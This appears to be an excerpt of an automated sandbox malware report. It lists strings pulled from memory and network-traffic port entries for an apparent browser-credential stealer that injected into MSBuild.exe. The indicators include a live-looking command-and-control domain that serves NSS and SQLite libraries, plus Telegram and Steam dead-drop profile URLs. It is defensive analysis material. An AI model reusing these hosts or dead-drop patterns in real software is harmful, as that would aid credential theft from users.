Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3356483728.0000000000F29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/freebl3.dll
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/freebl3.dllWiy
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/mozglue.dll
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/msvcp140.dll
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/nss3.dll
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/softokn3.dll3i%
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/softokn3.dllCiu
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/sql.dll
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/sql.dllIs
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000F29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/vcruntime140.dll
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/y
Source: file.exe, file.exe, 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80
Source: MSBuild.exe, 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80/sql.dll
Source: file.exe, 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80nfwqnfwovfdkhttps://steamcommunity.com/profiles/76561199780418869u5
Source: MSBuild.exe, 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com:80t-Disposition:
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000001.00000002.3364521729.000000001FE5D000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: CAAKFI.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: CAAKFI.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: CAAKFI.1.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: CAAKFI.1.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: CAAKFI.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: CAAKFI.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: CAAKFI.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DAECAE.1.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: https://mozilla.org0/
Source: file.exe, file.exe, 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: HIIIJD.1.dr	String found in binary or memory: https://support.mozilla.org
Source: HIIIJD.1.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HIIIJD.1.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, file.exe, 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: file.exe, 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: MSBuild.exe, 00000001.00000002.3356483728.0000000001009000.00000004.00000020.00020000.00000000.sdmp, DAECAE.1.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: CAAKFI.1.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: CAAKFI.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HIIIJD.1.dr	String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000001.00000002.3360782323.0000000019BB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HIIIJD.1.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: MSBuild.exe, 00000001.00000002.3360782323.0000000019BB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HIIIJD.1.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: MSBuild.exe, 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3360782323.0000000019BB9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: HIIIJD.1.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MSBuild.exe, 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Zone:
Source: MSBuild.exe, 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HIIIJD.1.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: HIIIJD.1.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: MSBuild.exe, 00000001.00000002.3360782323.0000000019BB9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: MSBuild.exe, 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/ed
Source: HIIIJD.1.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
